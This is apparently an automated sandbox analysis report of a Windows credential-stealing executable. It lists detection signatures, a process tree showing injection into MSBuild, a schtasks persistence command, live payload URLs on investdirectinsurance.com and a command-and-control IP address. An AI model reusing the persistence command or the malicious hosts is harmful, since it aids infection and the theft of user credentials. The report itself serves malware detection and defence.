Windows Analysis Report
Mu7iyblZk8.exe

Overview

General Information

Sample name: Mu7iyblZk8.exe (renamed because original name is a hash value)
Original sample name: efdac8eafdf875de010fe0a6980aad44b547c2a74430c185a28d67e98168c4b3.exe
Analysis ID: 1483418
MD5: 74f11a170c0a518ce076ae43f70a7c06
SHA1: 86cafa195ca0905f79a4e877c13ad0c7ced257e5
SHA256: efdac8eafdf875de010fe0a6980aad44b547c2a74430c185a28d67e98168c4b3
Tags: exe, investdirectinsurance-com

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Sigma detected: Silenttrinity Stager Msbuild Activity
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Mu7iyblZk8.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\Mu7iyblZk8.exe" MD5: 74F11A170C0A518CE076AE43F70A7C06)
    • MSBuild.exe (PID: 7732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 8012 cmdline: "wmic" csproduct get UUID MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7772 cmdline: "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7840 cmdline: schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • WareHouse.exe (PID: 8060 cmdline: C:\Users\user\AppData\Roaming\WareHouse.exe MD5: 74F11A170C0A518CE076AE43F70A7C06)
    • MSBuild.exe (PID: 1272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 3636 cmdline: "wmic" csproduct get UUID MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.3813836224.0000000000423000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Mu7iyblZk8.exe PID: 7560 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Source | Rule | Description | Author | Strings
11.2.MSBuild.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Mu7iyblZk8.exe.12c89ac0.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Source: Network Connection | Author: Kiran kumar s, oscd.community | Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7732, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49708
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f, CommandLine: schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7772, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f, ProcessId: 7840, ProcessName: schtasks.exe
No Snort rule has matched
Timestamp: 2024-07-27T11:37:19.604629+0200 | SID: 2803270 | Source Port: 49710 | Destination Port: 443 | Protocol: TCP | Classtype: Potentially Bad Traffic
Timestamp: 2024-07-27T11:37:15.181306+0200 | SID: 2803270 | Source Port: 49707 | Destination Port: 443 | Protocol: TCP | Classtype: Potentially Bad Traffic
Timestamp: 2024-07-27T11:37:20.758950+0200 | SID: 2803270 | Source Port: 49711 | Destination Port: 443 | Protocol: TCP | Classtype: Potentially Bad Traffic
Timestamp: 2024-07-27T11:37:14.109499+0200 | SID: 2803270 | Source Port: 49706 | Destination Port: 443 | Protocol: TCP | Classtype: Potentially Bad Traffic
Timestamp: 2024-07-27T11:37:31.016993+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 49714 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-27T11:38:08.651121+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 49716 | Protocol: TCP | Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Roaming\WareHouse.exe | ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\WareHouse.exe | Virustotal: Detection: 24%
Source: Mu7iyblZk8.exe | Virustotal: Detection: 24%
Source: Mu7iyblZk8.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49704 version: TLS 1.2
Source: Mu7iyblZk8.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\User\Desktop\Outputs\Omboxaav.pdb source: Mu7iyblZk8.exe, WareHouse.exe.0.dr
Source: Binary string: C:\Users\User\Desktop\Outputs\Omboxaav.pdbP source: Mu7iyblZk8.exe, WareHouse.exe.0.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 0261A85Ch | 3_2_0261A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 0261A86Fh | 3_2_0261A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 04E67D24h | 3_2_04E67988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 3_2_04E6AA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 3_2_04E62984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 3_2_04E62990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-000000C4h] | 3_2_04E69902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 3_2_05B8F7E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then inc dword ptr [ebp-1Ch] | 3_2_05B80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 0128CD4Ch | 11_2_0128CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 0128CD5Fh | 11_2_0128CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 05E104F2h | 11_2_05E10440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 05E104F2h | 11_2_05E10448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov eax, dword ptr [ebp-28h] | 11_2_05E1DA67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 11_2_06655519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 11_2_0665B5B1
Source: global traffic | TCP traffic: 192.168.2.9:49709 -> 45.94.31.188:1237
Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 34.117.59.81
Source: Joe Sandbox View | ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1 User-Agent: Mozilla/5.0 Host: investdirectinsurance.com Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /assuence/litesolidCha/Miox.bd HTTP/1.1 User-Agent: Mozilla/5.0 Host: investdirectinsurance.com Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown | TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 45.94.31.188
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Mu7iyblZk8.exe | Code function: 0_2_00007FF886E1166F InternetReadFile, 0_2_00007FF886E1166F
Source: global traffic | DNS traffic detected: DNS query: investdirectinsurance.com
Source: global traffic | DNS traffic detected: DNS query: ipinfo.io
Source: MSBuild.exe, 00000003.00000002.3816380121.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WareHouse.exe.0.dr | String found in binary or memory: https://collection.hubanalytics.io/
Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3813836224.0000000000429000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/v9/users/
Source: WareHouse.exe, 0000000A.00000002.1466432583.000000001BBCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/
Source: WareHouse.exe, 0000000A.00000002.1466432583.000000001BBB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/7f)
Source: WareHouse.exe, 0000000A.00000002.1464504535.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, WareHouse.exe, 0000000A.00000002.1465533364.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, Mu7iyblZk8.exe, WareHouse.exe.0.dr | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Miox.bd
Source: Mu7iyblZk8.exe, 00000000.00000002.1410420003.000000001BC61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Miox.bdY
Source: Mu7iyblZk8.exe, WareHouse.exe.0.dr | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd
Source: Mu7iyblZk8.exe, 00000000.00000002.1404302143.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd~
Source: WareHouse.exe, 0000000A.00000002.1466432583.000000001BBB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://investdirectinsurance.com/sf
Source: Mu7iyblZk8.exe, 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.3816380121.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3813836224.0000000000429000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/json
Source: MSBuild.exe, 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/missingauth
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window created: window name: CLIPBRDWNDCLASS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
